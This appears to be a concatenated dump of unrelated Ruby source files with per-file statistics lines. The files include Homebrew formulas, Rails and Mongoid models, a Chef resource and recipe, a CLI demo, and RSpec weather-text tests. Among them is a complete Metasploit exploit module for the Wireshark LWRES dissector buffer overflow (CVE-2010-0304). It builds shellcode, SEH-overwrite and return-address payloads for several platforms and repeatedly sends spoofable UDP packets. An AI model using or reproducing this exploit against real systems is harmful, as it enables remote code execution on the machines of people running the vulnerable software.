# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 48.773109 | 281 | 0.714938 |
f843d76f7af3b0f7637453efbb723cecb6866230 | 3,691 | class Libeemd < Formula
desc "Library for performing the ensemble empirical mode decomposition"
homepage "https://bitbucket.org/luukko/libeemd"
url "https://bitbucket.org/luukko/libeemd/get/v1.4.tar.gz"
sha256 "c484f4287f4469f3ac100cf4ecead8fd24bf43854efa63650934dd698d6b298b"
head "https://bitbucket.org/luukko/libeemd.git"
# doi "10.1007/s00180-015-0603-9"
bottle do
cellar :any
sha256 "071ec8487eb593553d0afe62e14f53f7c9c533922e520015e3bfee9f90b152cb" => :sierra
sha256 "58ca938d5577cdedc26943d7badcdfe6c86a6e3710b0022bb9a4bdf74d6c1acb" => :el_capitan
sha256 "003419ec5ee70b9b7aa3606b4e3199e9a6427cd20689db6995519cb0a0a38d23" => :yosemite
sha256 "599aa4e28bfe2136a38b3289d5254189091f856fb0d48ebf40fafaf1d578c0cb" => :x86_64_linux
end
depends_on "gsl"
depends_on "pkg-config" => :build
needs :openmp
# The patch fixes the Makefile build option to use the -dynamiclib
# option instead of the -shared option when making a macOS dynamic
# link library and also fixes the dynamic link library suffix name
# to follow the name convention used in macOS. Since the original
# Makefile does not support multi-platform configuration, we handle
# this with a local patch until the original author switches to use
# autoconf or some other flexible build environment adaptation
# tools.
patch :DATA
def install
system "make"
system "make", "install", "PREFIX=#{prefix}"
end
test do
(testpath/"test.c").write <<~EOS
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <gsl/gsl_math.h>
#include <eemd.h>
const size_t ensemble_size = 250;
const unsigned int S_number = 4;
const unsigned int num_siftings = 50;
const double noise_strength = 0.2;
const unsigned long int rng_seed = 0;
const size_t N = 1024;
static inline double input_signal(double x) {
const double omega = 2*M_PI/(N-1);
return sin(17*omega*x)+0.5*(1.0-exp(-0.002*x))*sin(51*omega*x+1);
}
int main(void) {
libeemd_error_code err;
double* inp = malloc(N*sizeof(double));
for (size_t i=0; i<N; i++) {
inp[i] = input_signal((double)i);
}
size_t M = emd_num_imfs(N);
double* outp = malloc(M*N*sizeof(double));
err = eemd(inp, N, outp, M, ensemble_size, noise_strength,
S_number, num_siftings, rng_seed);
if (err != EMD_SUCCESS) {
return -1;
}
return 0;
}
EOS
system ENV.cc, "test.c", "-I#{include}", "-L#{lib}", "-leemd", "-o", "test"
system "./test"
end
end
__END__
--- a/Makefile 2016-09-19 16:58:13.000000000 +0900
+++ b/Makefile 2016-12-08 11:50:50.000000000 +0900
@@ -23,7 +23,7 @@
endef
export uninstall_msg
-all: libeemd.so.$(version) libeemd.a eemd.h
+all: libeemd.$(version).dylib libeemd.a eemd.h
clean:
rm -f libeemd.so libeemd.so.$(version) libeemd.a eemd.h obj/eemd.o
@@ -34,8 +34,8 @@
install -d $(PREFIX)/lib
install -m644 eemd.h $(PREFIX)/include
install -m644 libeemd.a $(PREFIX)/lib
- install libeemd.so.$(version) $(PREFIX)/lib
- cp -Pf libeemd.so $(PREFIX)/lib
+ install libeemd.$(version).dylib $(PREFIX)/lib
+ cp -Pf libeemd.dylib $(PREFIX)/lib
uninstall:
@echo "$$uninstall_msg"
@@ -49,9 +49,9 @@
libeemd.a: obj/eemd.o
$(AR) rcs $@ $^
-libeemd.so.$(version): src/eemd.c src/eemd.h
- gcc $(commonflags) $< -fPIC -shared -Wl,$(SONAME),$@ $(gsl_flags) -o $@
- ln -sf $@ libeemd.so
+libeemd.$(version).dylib: src/eemd.c src/eemd.h
+ gcc $(commonflags) $< -fPIC -dynamiclib -Wl,$(SONAME),$@ $(gsl_flags) -o $@
+ ln -sf $@ libeemd.dylib
eemd.h: src/eemd.h
cp $< $@
| 32.095652 | 94 | 0.663777 |
7ad24790754aa4e8210ad256e11d2a29103a8f7b | 1,013 | json.key_format!(camelize: :lower)
json.call(Pageflow.config,
:confirm_encoding_jobs,
:available_locales,
:available_public_locales,
:available_text_track_kinds,
:available_share_providers)
json.file_types Pageflow.config.file_types do |file_type|
json.collection_name file_type.collection_name
json.top_level_type file_type.top_level_type
json.type_name file_type.type_name
json.param_key file_type.param_key
json.i18n_key file_type.i18n_key
json.nested_file_types file_type.nested_file_types do |nested_file_type|
json.collection_name nested_file_type.collection_name
end
end
json.default_author_meta_tag Pageflow.config.default_author_meta_tag
json.default_publisher_meta_tag Pageflow.config.default_publisher_meta_tag
json.default_keywords_meta_tag Pageflow.config.default_keywords_meta_tag
json.themes(Pageflow.config.themes, :name, :preview_image_path)
json.edit_lock_polling_interval_in_seconds Pageflow.config.edit_lock_polling_interval
| 44.043478 | 85 | 0.831194 |
391f462298dc0fe3c4e331424c551a6dbfa721cb | 1,956 | class Location
include Mongoid::Document
include Mongoid::Timestamps
include Mongoid::Ancestry
include Resourceable
field :resource_owner_id, type: Moped::BSON::ObjectId
field :name
field :type, default: 'generic'
field :device_ids, type: Array, default: []
index({ resource_owner_id: 1 }, { background: true })
index({ type: 1 }, { background: true })
index({ name: 1 }, { background: true })
index({ device_ids: 1 }, { background: true })
attr_accessor :into, :locations, :devices
attr_protected :resource_owner_id, :location_ids, :device_ids, :updated_at
has_ancestry orphan_strategy: :rootify
validates :resource_owner_id, presence: true
validates :name, presence: true
validates :type, presence: true, inclusion: { in: Settings.locations.types }
validates :into, uri: { allow_nil: true }, owned: true
validates :locations, uri: true, owned: true
validates :devices, uri: true, owned: true
before_update :move_children_to_root
before_save :set_parent_id, :set_device_ids
after_save :set_location_ids
after_save :touch_ancestors, :touch_children
def active_model_serializer; LocationSerializer; end
def children_devices
children.map(&:device_ids).flatten
end
def descendants_devices
descendants.map(&:device_ids).flatten
end
private
def set_parent_id
self.parent_id = find_id(into) if into
end
def set_location_ids
Location.in(id: find_ids(locations)).each { |l| l.update_attributes(parent_id: self.id) } if locations
end
def set_device_ids
self.device_ids = find_ids(devices).map{|id| Moped::BSON::ObjectId(id) } if devices
end
def move_children_to_root
children.each { |l| l.update_attributes(parent_id: nil) } if locations
end
def touch_ancestors
ancestors.update_all(updated_at: Time.now) if name_changed?
end
def touch_children
descendants.update_all(updated_at: Time.now) if name_changed?
end
end
| 27.942857 | 106 | 0.731595 |
ff5c0e30c82dbb03f8d9b5a5b0361977fb067349 | 154 | module Ahoy
class Message < ActiveRecord::Base
self.table_name = "ahoy_messages"
belongs_to :user, polymorphic: true, optional: true
end
end
| 19.25 | 55 | 0.727273 |
08f6226a333e7ae000e9018a79f2b4ce0a5731d8 | 1,268 | $:.unshift File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib')
require 'luban/cli'
class HelloApp < Luban::CLI::Application
HelloTexts = { english: 'Hello', french: 'Bonjour',
german: 'Halo', italian: 'Ciao',
chinese: '您好', japanese: 'こんにちは',
korean: '안녕하세요' }
Languages = HelloTexts.keys
configure do
# program "hello"
version '1.0.0'
desc "Say hello to someone"
long_desc "Demo app for Luban::CLI"
option :lang, "Language to say hello", short: :l,
type: :symbol, default: :english, within: Languages
switch :verbose, "Run in verbose mode", short: :V
argument :name, "Name to say hello"
action :say_hello
end
def say_hello(args:, opts:)
hello_text = HelloTexts[opts[:lang]]
name = args[:name]
if opts[:verbose]
say_hello_verbosely(hello_text, name, opts, args)
else
say_hello_concisely(hello_text, name)
end
end
protected
def say_hello_verbosely(hello_text, name, opts, args)
puts "Options: #{opts.inspect}"
puts "Arguments: #{args.inspect}"
say_hello_concisely(hello_text, name)
end
def say_hello_concisely(hello_text, name)
puts "#{hello_text}, #{name}!"
end
end
HelloApp.new.run
| 26.978723 | 75 | 0.638801 |
1cac2bf68a174cd01e3b64db56a2bca7b5205c10 | 1,816 | class BatchCompareService < ApplicationService
attr_reader :datasets, :hierarchy
def initialize(options = {
datasets: [NBS::NewbornRecord.all, OVRS::NewbornRecord.all],
hierarchy: CsvRecord::FIELD_HIERARCHY,
requestor: 'system'
})
raise ArgumentError unless options[:datasets].length == 2
@datasets = options[:datasets]
@hierarchy = options[:hierarchy]
@requestor = options[:requestor]
end
def call!
Report.new requestor: @requestor,
data: {
conflicts: conflicts,
nbs: datasets.first,
ovrs: datasets.second
},
type: 'DiscrepancyReport'
end
private
def choose_id(*records)
uuid_regex = /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/ # rubocop:disable Metrics/LineLength
ids = records.map(&:id).compact
without_uuid = ids.reject { |id| uuid_regex.match?(id) }
without_uuid.empty? ? ids.first : without_uuid.first
end
def compare(record, other)
difference = record.attributes.to_a - other.attributes.to_a
Hash[*difference.flatten]
end
def conflicts
conflict_hash.to_a.map do |id, fields|
{
id: id,
nbs: NBS::NewbornRecord.find_or_match(id, OVRS::NewbornRecord).try(:attributes),
ovrs: OVRS::NewbornRecord.find_or_match(id, NBS::NewbornRecord).try(:attributes),
fields: fields
}
end
end
def conflict_hash
hash = Hash.new { |h, k| h[k] = Set.new }
datasets.permutation.each do |control, other|
control.each do |record|
linked = record.match other
diffs = linked ? compare(record, linked) : {}
diffs.each_key { |prop| hash[choose_id(record, linked)].add(prop) }
end
end
hash
end
end
| 29.290323 | 129 | 0.618943 |
f73feb04861e3eb083397fdc26af780fd52cf250 | 2,319 | #
# Author:: Seth Chisamore (<[email protected]>)
# Author:: Lamont Granquist (<[email protected]>)
# Author:: Marco Betti (<[email protected]>)
# Copyright:: Copyright (c) 2011 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require File.join(File.dirname(__FILE__), 'resource_database_user')
require File.join(File.dirname(__FILE__), 'provider_database_postgresql_user')
class Chef
class Resource
class PostgresqlDatabaseUser < Chef::Resource::DatabaseUser
def initialize(name, run_context = nil)
super
@resource_name = :postgresql_database_user
@provider = Chef::Provider::Database::PostgresqlUser
@createdb = false
@createrole = false
@login = true
@replication = false
@superuser = false
@schema_name = nil
@allowed_actions.push(:create, :drop, :grant, :grant_schema)
end
def createdb(arg = nil)
set_or_return(
:createdb,
arg,
equal_to: [true, false]
)
end
def createrole(arg = nil)
set_or_return(
:createrole,
arg,
equal_to: [true, false]
)
end
def login(arg = nil)
set_or_return(
:login,
arg,
equal_to: [true, false]
)
end
def replication(arg = nil)
set_or_return(
:replication,
arg,
equal_to: [true, false]
)
end
def schema_name(arg = nil)
set_or_return(
:schema_name,
arg,
kind_of: String
)
end
def superuser(arg = nil)
set_or_return(
:superuser,
arg,
equal_to: [true, false]
)
end
end
end
end
| 25.766667 | 78 | 0.605002 |
33a28f1eefbb759d25cf6e30b6bce0c31f2eb92d | 190 | # frozen_string_literal: true
class AddAssignedUserToIdeas < ActiveRecord::Migration[5.2]
def change
add_reference :ideas, :assigned_user, foreign_key: { to_table: :users }
end
end
| 23.75 | 75 | 0.763158 |
18db711cc3c0e23ebe9c72b10784e3fafad071fc | 8,715 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Capture
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',
'Description' => %q{
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
overflow. This bug found and reported by babi.
This particular exploit targets the dissect_getaddrsbyname_request function. Several
other functions also contain potentially exploitable stack-based buffer overflows.
The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents
exploitation via the return address on the stack. Sending a larger string allows
exploitation using the SEH bypass method. However, this packet will usually get
fragmented, which may cause additional complications.
NOTE: The vulnerable code is reached only when the packet dissection is rendered.
If the packet is fragmented, all fragments must be captured and reassembled to
exploit this issue.
This version loops, sending the packet every X seconds until the job is killed.
},
'Author' =>
[
'babi', # original discovery/exploit
'jduck', # ported from public exploit
'redsand' # windows target/testing
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-0304' ],
[ 'OSVDB', '61987' ],
[ 'BID', '37985' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],
[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true, # at least capture privilege
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
'DisableNops' => true,
},
'DefaultTarget' => 4,
'Platform' => %w{ linux osx win },
'Targets' =>
[
[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
# breakpoint: lwres.so + 0x2ce2
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
# conveniently, edx pointed at our string..
# and so, we write it to g_slist_append's GOT entry just before its called.
# pwnt.
#
# mov [ebx+0xc],edx / jmp 0x804fc40 -->
# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append
#
'Ret' => 0x804fc85, # see above..
'RetOff' => 376,
'Readable' => 0x804fa04, # just anything
'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append
}
],
[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
# the method for tshark doesn't work, since there aren't any convenient
# pointers lying around (in reg/close on stack)
#
# since the wireshark bin has a jmp esp, we'll just use that method..
'Ret' => 0x818fce8, # jmp esp in wireshark bin
'RetOff' => 376,
'Readable' => 0x8066a40, # just any old readable addr (unused)
'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)
}
],
[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux',
'Ret' => 0xfeedfed5deadbeef,
'RetOff' => 152,
}
],
[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'osx',
'Ret' => 0xdeadbeef,
'RetOff' => 268,
}
],
# The following target was tested against Windows XP SP3 and Windows Vista
[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
# NOTE: due to the length of this packet, your mileage may vary.
'Ret' => 0x61B4121B,
# 0x655810b6 = pop/pop/ret in libpango
# 0x02A110B6 = pop/pop/ret in libgtk-w
# 0x03D710CC = pop/mov/pop/ret in packet
# 0x61B4121B = pop/pop/ret in pcre3
'RetOff' => 2128,
}
],
],
'DisclosureDate' => 'Jan 27 2010',
# Set it to passive mode to background it.
'Stance' => Msf::Exploit::Stance::Passive))
register_options([
Opt::RPORT(921),
Opt::RHOST("239.255.255.250"),
OptAddress.new( 'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),
OptInt.new( 'DELAY', [true, 'This option sets the delay between sent packets', 5])
], self.class)
register_advanced_options([
OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ])
], self.class)
deregister_options('FILTER','PCAPFILE')
end
def exploit
check_pcaprub_loaded # Check first
ret_offset = target['RetOff']
# we have different techniques depending on the target
if (target == targets[0])
# debian tshark
str = make_nops(ret_offset - payload.encoded.length - 16)
str << payload.encoded
str << [target['GotAddr'] - 0xc].pack('V')
str << rand_text(4)
str << [target['Readable']].pack('V')
str << rand_text(4)
# ret is next
elsif (target == targets[1])
fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
str << fix_esp
str << payload.encoded
# jmp esp...
str << [target.ret].pack('V')
# jump back
distance = ret_offset + 4
str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
elsif (target == targets[4])
# ugh, /GS and UDP length issues :-/
str = make_nops(ret_offset - payload.encoded.length)
str << payload.encoded
str << generate_seh_record(target.ret)
# jump back
distance = ret_offset + 8
str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
else
# this is just a simple DoS payload
str = Rex::Text.pattern_create(ret_offset)
#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+6").encode_string
end
# add return address
#XXX: this isn't working?
#str << Rex::Arch.pack_addr(target.arch, target.ret)
str << [target.ret].pack('V')
# form the packet's payload!
sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
sploit << "\x00\x00\x00\x01"
sploit << [str.length].pack('n')
sploit << str
sploit << "\x00\x00"
shost = datastore['SHOST']
if (shost)
print_status("Sending malformed LWRES packet (spoofed from #{shost})")
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
p.ip_daddr = rhost
p.udp_sport = rand((2**16)-1024)+1024
p.udp_dport = datastore['RPORT'].to_i
p.payload = sploit
p.recalc
while true
break if session_created? and datastore['ExitOnSession']
break unless capture_sendto(p, rhost)
select(nil,nil,nil,datastore['DELAY'])
end
close_pcap
handler
else
print_status("Sending malformed LWRES packet every #{datastore['DELAY']} seconds.")
handler
while true
break if session_created? and datastore['ExitOnSession']
connect_udp
udp_sock.put(sploit)
disconnect_udp
select(nil,nil,nil,datastore['DELAY'])
end
end
end
end
| 36.012397 | 141 | 0.565232 |
1adb6de00a371be0f351370975e641ca881389f8 | 962 | require "spec_helper"
describe Chartmogul::Import::Plan do
describe ".create" do
it "creates a new plan" do
plan_attributes = {
data_source_uuid: "ds_uuid_001",
name: "Bronze Plan",
interval_count: 1,
interval_unit: "month",
external_id: "plan_001"
}
stub_plan_create_api(plan_attributes)
plan = Chartmogul::Import::Plan.create(plan_attributes)
expect(plan.uuid).not_to be_nil
expect(plan.name).to eq(plan_attributes[:name])
expect(plan.data_source_uuid).to eq(plan_attributes[:data_source_uuid])
end
end
describe ".list" do
it "lists all the plans" do
listing_options = { page: 1, per_page: 3 }
stub_plan_list_api(listing_options)
plans = Chartmogul::Import::Plan.list(listing_options)
expect(plans.current_page).to eq(1)
expect(plans.plans.count).to eq(3)
expect(plans.plans.first.uuid).not_to be_nil
end
end
end
| 27.485714 | 77 | 0.66632 |
e98c0f1fa6b4b0f0319449cf5afff6b0b3c29eed | 1,367 | #
# Cookbook Name:: chef-odi-base
# Recipe:: default
#
# Copyright (C) 2014 The Open Data Institute
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
include_recipe 'odi-apt'
include_recipe 'chef-client::config'
include_recipe 'chef-client::cron'
include_recipe 'odi-monitoring'
include_recipe 'git'
include_recipe 'odi-pk'
include_recipe 'envbuilder'
| 36.945946 | 72 | 0.776152 |
0819c92a0f9002792ee24508d41f1d7a3473d867 | 130 | class ChangeStartTimeToBigInt2 < ActiveRecord::Migration[5.2]
def change
add_column :routes, :start_time, :bigint
end
end
| 21.666667 | 61 | 0.761538 |
1aee184fe2c35e89ba3e5064eb4faa3cd8df308b | 12,021 | require "spec_helper"
require "ruby_utils/statistic"
require "wrf_forecast/threshold"
require "wrf_forecast/text"
describe WrfForecast::Text::TemperatureText do
describe ".new" do
context "given an array of temperature data for an ice day" do
it "generate and check temperature forecast text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
271, 271, 272, 272, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 272.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_very_frosty"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("-1")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("-8")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a frost day" do
it "generate and check temperature forecast text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
272, 272, 273, 274, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 274.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_cold"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("1")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("-8")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a spring day" do
it "generate and check temperature forecast text" do
temperature_values = [ 278, 278, 278, 278, 277, 277, 277, 277, 276, 276,
276, 276, 275, 275, 275, 275, 276, 276, 276, 276,
277, 277, 278, 278, 279, 279, 280, 280, 281, 281,
281, 281, 282, 282, 281, 281, 281, 280, 280, 280,
279, 279, 279, 279, 278, 278, 278, 278, 278, 277
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(275.15, 282.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_normal"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("9")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("2")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a summer day" do
it "generate and check temperature forecast text" do
temperature_values = [ 290, 290, 290, 290, 289, 289, 289, 289, 288, 288,
289, 289, 290, 290, 291, 291, 292, 292, 293, 293,
294, 295, 296, 297, 298, 299, 300, 300, 300, 300,
300, 301, 301, 300, 300, 299, 298, 297, 296, 295,
294, 294, 293, 293, 292, 292, 291, 291, 290, 290
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(288.15, 301.05)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_summer"))
expected.concat(I18n.t("forecast_text.temperature.text_day")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("28")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("15")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for a hot day with tropical night" do
it "generate and check temperature forecast text" do
temperature_values = [ 296, 296, 296, 295, 295, 295, 294, 294, 294, 294,
295, 295, 296, 296, 297, 297, 298, 298, 299, 299,
300, 300, 301, 301, 302, 302, 303, 303, 304, 304,
305, 305, 304, 304, 303, 303, 302, 302, 301, 300,
299, 299, 298, 298, 297, 297, 296, 296, 296, 296
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(294.15, 305.25)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("forecast_text.temperature.text_start")
expected.concat(I18n.t("forecast_text.temperature.warmth_hot"))
expected.concat(I18n.t("forecast_text.temperature.text_day"))
expected.concat(I18n.t("forecast_text.temperature.warmth_tropical")).concat(".")
expected.concat(I18n.t("forecast_text.temperature.text_maximum")).concat("33")
expected.concat(I18n.t("forecast_text.temperature.text_minimum")).concat("21")
expected.concat(I18n.t("forecast_text.temperature.text_finish"))
expect(forecast.text).to eq(expected)
end
end
end
describe ".new" do
context "given an array of temperature data for an ice day" do
it "generate and check temperature warning text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
271, 271, 272, 272, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 272.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to eq(I18n.t("threshold.temperature.ice_day"))
end
end
end
describe ".new" do
context "given an array of temperature data for a frost day" do
it "generate and check temperature warning text" do
temperature_values = [ 268, 268, 268, 268, 267, 267, 267, 267, 266, 266,
266, 266, 265, 265, 265, 265, 266, 266, 266, 266,
267, 267, 268, 268, 269, 269, 270, 270, 271, 271,
272, 272, 273, 274, 271, 271, 271, 270, 270, 270,
269, 269, 269, 269, 268, 268, 268, 268, 268, 267
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(265.15, 274.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to eq(I18n.t("threshold.temperature.frost_day"))
end
end
end
describe ".new" do
context "given an array of temperature data for a spring day" do
it "generate and check temperature forecast text" do
temperature_values = [ 278, 278, 278, 278, 277, 277, 277, 277, 276, 276,
276, 276, 275, 275, 275, 275, 276, 276, 276, 276,
277, 277, 278, 278, 279, 279, 280, 280, 281, 281,
281, 281, 282, 282, 281, 281, 281, 280, 280, 280,
279, 279, 279, 279, 278, 278, 278, 278, 278, 277
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(275.15, 282.15)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to be_empty
end
end
end
describe ".new" do
context "given an array of temperature data for a summer day" do
it "generate and check temperature forecast text" do
temperature_values = [ 290, 290, 290, 290, 289, 289, 289, 289, 288, 288,
289, 289, 290, 290, 291, 291, 292, 292, 293, 293,
294, 295, 296, 297, 298, 299, 300, 300, 300, 300,
300, 301, 301, 300, 300, 299, 298, 297, 296, 295,
294, 294, 293, 293, 292, 292, 291, 291, 290, 290
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(288.15, 301.05)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expect(forecast.warnings).to eq(I18n.t("threshold.temperature.summer_day"))
end
end
end
describe ".new" do
context "given an array of temperature data for a hot day with tropical night" do
it "generate and check temperature forecast text" do
temperature_values = [ 296, 296, 296, 295, 295, 295, 294, 294, 294, 294,
295, 295, 296, 296, 297, 297, 298, 298, 299, 299,
300, 300, 301, 301, 302, 302, 303, 303, 304, 304,
305, 305, 304, 304, 303, 303, 302, 302, 301, 300,
299, 299, 298, 298, 297, 297, 296, 296, 296, 296
]
indicators = WrfForecast::Threshold::TemperatureThreshold.new(temperature_values)
extreme_values = RubyUtils::ExtremeValues.new(294.15, 305.25)
forecast = WrfForecast::Text::TemperatureText.new(extreme_values, indicators.indicators)
expected = I18n.t("threshold.temperature.hot_day")
expected.concat("\n").concat(I18n.t("threshold.temperature.tropical_night"))
expect(forecast.warnings).to eq(expected)
end
end
end
end
| 56.70283 | 96 | 0.598536 |
abca4be679a1f1a5edb5839c139bcd19e15836b5 | 1,217 | class Editorconfig < Formula
desc "Maintain consistent coding style between multiple editors"
homepage "https://editorconfig.org/"
url "https://github.com/editorconfig/editorconfig-core-c/archive/v0.12.4.tar.gz"
sha256 "c2671595f1793b498cdf50b9dc03d632cc724891de7909f2ea78588fbffba289"
license "BSD-2-Clause"
